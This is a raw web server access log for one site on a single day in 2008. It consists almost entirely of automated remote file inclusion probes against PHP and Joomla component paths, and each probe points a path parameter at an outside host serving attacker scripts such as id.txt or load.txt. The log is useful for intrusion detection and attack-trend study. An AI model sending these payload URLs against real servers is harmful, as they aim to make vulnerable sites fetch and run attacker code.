219.94.162.186 - - [26/Feb/2008:11:53:16 -0800] "GET /logs/index.php?option=com_joomlaxplorer&task=cat_view&gid=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
209.82.34.252 - - [26/Feb/2008:11:53:32 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:11:54:04 -0800] "GET /logs/access_071116.log//main.php?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:11:54:04 -0800] "GET //main.php?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:11:54:05 -0800] "GET /logs//main.php?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.72.221.130 - - [26/Feb/2008:11:54:37 -0800] "GET /logs/access_071224.log//main.php?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.20.54.118 - - [26/Feb/2008:11:54:57 -0800] "GET /logs/access_080120.log//lazarusgb/admin.php?include_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.54.118 - - [26/Feb/2008:11:54:57 -0800] "GET //lazarusgb/admin.php?include_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.54.118 - - [26/Feb/2008:11:54:57 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:11:55:03 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
216.120.227.52 - - [26/Feb/2008:11:55:22 -0800] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://teamgoc.com/media/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.120.227.52 - - [26/Feb/2008:11:55:22 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://teamgoc.com/media/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.120.227.52 - - [26/Feb/2008:11:55:23 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://teamgoc.com/media/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.20.54.118 - - [26/Feb/2008:11:55:33 -0800] "GET /logs/access_080120.log//lazarusgb/admin.php?include_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.54.118 - - [26/Feb/2008:11:55:33 -0800] "GET //lazarusgb/admin.php?include_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.54.118 - - [26/Feb/2008:11:55:33 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.46.109 - - [26/Feb/2008:11:55:54 -0800] "GET /index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.249.46.109 - - [26/Feb/2008:11:55:54 -0800] "GET /logs/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
209.82.34.252 - - [26/Feb/2008:11:56:20 -0800] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.202 - - [26/Feb/2008:11:56:27 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://teamgoc.com/media/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:11:57:07 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.64.18 - - [26/Feb/2008:11:57:31 -0800] "GET /logs/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
202.60.64.18 - - [26/Feb/2008:11:57:31 -0800] "GET /index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:11:57:34 -0800] "GET /logs/access_071224.log//main.php?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.135.109.228 - - [26/Feb/2008:11:58:07 -0800] "GET /logs/access_080211.log/index.php?pagina=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:11:58:11 -0800] "GET /logs/access_080131.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:11:58:11 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:11:58:11 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.239.4.4 - - [26/Feb/2008:11:58:18 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.4.4 - - [26/Feb/2008:11:58:21 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.87.108 - - [26/Feb/2008:11:58:30 -0800] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://teamgoc.com/media/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.87.108 - - [26/Feb/2008:11:58:30 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://teamgoc.com/media/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.87.108 - - [26/Feb/2008:11:58:31 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://teamgoc.com/media/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.202 - - [26/Feb/2008:11:58:45 -0800] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://teamgoc.com/media/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.202 - - [26/Feb/2008:11:58:46 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://teamgoc.com/media/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.202 - - [26/Feb/2008:11:58:46 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://teamgoc.com/media/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.99.154.68 - - [26/Feb/2008:11:59:02 -0800] "GET /logs/access_080121.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:11:59:03 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:11:59:07 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
158.38.0.218 - - [26/Feb/2008:11:59:15 -0800] "GET /retreat1/ HTTP/1.0" 200 15065 "-" "boitho.com-dc/0.86 ( http://www.boitho.com/dcbot.html )" "www.dmulk.com"
64.38.4.3 - - [26/Feb/2008:11:59:23 -0800] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [26/Feb/2008:11:59:23 -0800] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [26/Feb/2008:11:59:24 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:11:59:42 -0800] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.152.152 - - [26/Feb/2008:12:00:27 -0800] "GET /logs/include/functions_common.php?gl_root_path=http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
85.119.152.152 - - [26/Feb/2008:12:00:27 -0800] "GET /include/functions_common.php?gl_root_path=http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
195.70.35.179 - - [26/Feb/2008:12:01:39 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
64.38.4.3 - - [26/Feb/2008:12:01:59 -0800] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [26/Feb/2008:12:02:24 -0800] "GET /logs/access_071224.log//main.php?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:12:02:32 -0800] "GET /logs//include.php?path[docroot]=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:12:02:32 -0800] "GET //include.php?path[docroot]=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
72.233.15.85 - - [26/Feb/2008:12:03:28 -0800] "GET /index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.200.74 - - [26/Feb/2008:12:04:46 -0800] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.74 - - [26/Feb/2008:12:04:46 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.74 - - [26/Feb/2008:12:04:47 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.87.108 - - [26/Feb/2008:12:05:15 -0800] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://teamgoc.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.87.108 - - [26/Feb/2008:12:05:15 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://teamgoc.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.87.108 - - [26/Feb/2008:12:05:16 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://teamgoc.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.150.30.41 - - [26/Feb/2008:12:05:32 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.algebramovie.com/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.150.30.41 - - [26/Feb/2008:12:05:33 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.algebramovie.com/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.74 - - [26/Feb/2008:12:06:38 -0800] "GET /logs/access_080211.log/components/com_simpleboard/image_upload.php?sbp=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.25.34 - - [26/Feb/2008:12:07:02 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
65.98.25.34 - - [26/Feb/2008:12:07:03 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
65.91.249.193 - - [26/Feb/2008:12:07:05 -0800] "GET /index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.15.85 - - [26/Feb/2008:12:07:32 -0800] "GET /index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [26/Feb/2008:12:08:16 -0800] "GET /logs/access_080131.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [26/Feb/2008:12:08:16 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [26/Feb/2008:12:08:17 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.75.5.220 - - [26/Feb/2008:12:08:57 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [26/Feb/2008:12:08:57 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [26/Feb/2008:12:08:58 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.91.249.193 - - [26/Feb/2008:12:09:04 -0800] "GET /index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.106.65 - - [26/Feb/2008:12:09:31 -0800] "GET /logs/access_080122.log/index.php?sourcedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [26/Feb/2008:12:09:32 -0800] "GET /index.php?sourcedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [26/Feb/2008:12:09:32 -0800] "GET /logs/index.php?sourcedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [26/Feb/2008:12:10:00 -0800] "GET /logs/access_080120.log/index.php?sourcedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.25.13.106 - - [26/Feb/2008:12:10:05 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.25.13.106 - - [26/Feb/2008:12:10:07 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.25.13.106 - - [26/Feb/2008:12:10:09 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.74.90 - - [26/Feb/2008:12:10:48 -0800] "GET //main.php?p=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:12:11:07 -0800] "GET /logs/access.log/include/functions_common.php?gl_root_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:12:11:07 -0800] "GET /include/functions_common.php?gl_root_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:12:11:07 -0800] "GET /logs/include/functions_common.php?gl_root_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.150.30.41 - - [26/Feb/2008:12:12:05 -0800] "GET /logs/access_080117.log/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.algebramovie.com/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.150.30.41 - - [26/Feb/2008:12:12:05 -0800] "GET /logs/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.algebramovie.com/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.48.129 - - [26/Feb/2008:12:12:44 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.106.65 - - [26/Feb/2008:12:13:10 -0800] "GET /logs/access.log/index.php?sourcedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [26/Feb/2008:12:13:47 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
89.218.85.18 - - [26/Feb/2008:12:13:47 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:12:14:46 -0800] "GET /logs/access_080117.log/admin/index.php?o=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.142.139.189 - - [26/Feb/2008:12:14:46 -0800] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:12:14:46 -0800] "GET /admin/index.php?o=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.142.139.189 - - [26/Feb/2008:12:14:47 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:12:14:47 -0800] "GET /logs/admin/index.php?o=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.142.139.189 - - [26/Feb/2008:12:14:47 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.21.45.58 - - [26/Feb/2008:12:15:17 -0800] "GET /!scanftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.21.45.58 - - [26/Feb/2008:12:15:17 -0800] "GET /!scanftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:12:15:18 -0800] "GET /logs/access_080117.log/admin/index.php?o=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:12:15:19 -0800] "GET /admin/index.php?o=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:12:15:19 -0800] "GET /logs/admin/index.php?o=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:12:15:45 -0800] "GET /logs/access_080117.log/admin/index.php?o=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:12:15:46 -0800] "GET /admin/index.php?o=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:12:15:46 -0800] "GET /logs/admin/index.php?o=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:12:15:51 -0800] "GET /logs/access_080117.log/admin/index.php?o=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:12:15:51 -0800] "GET /admin/index.php?o=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:12:15:52 -0800] "GET /logs/admin/index.php?o=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.198.89.199 - - [26/Feb/2008:12:16:09 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [26/Feb/2008:12:16:09 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [26/Feb/2008:12:16:09 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.53.83.254 - - [26/Feb/2008:12:16:17 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
213.198.89.199 - - [26/Feb/2008:12:16:19 -0800] "GET /logs/access_080120.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.53.83.254 - - [26/Feb/2008:12:16:19 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
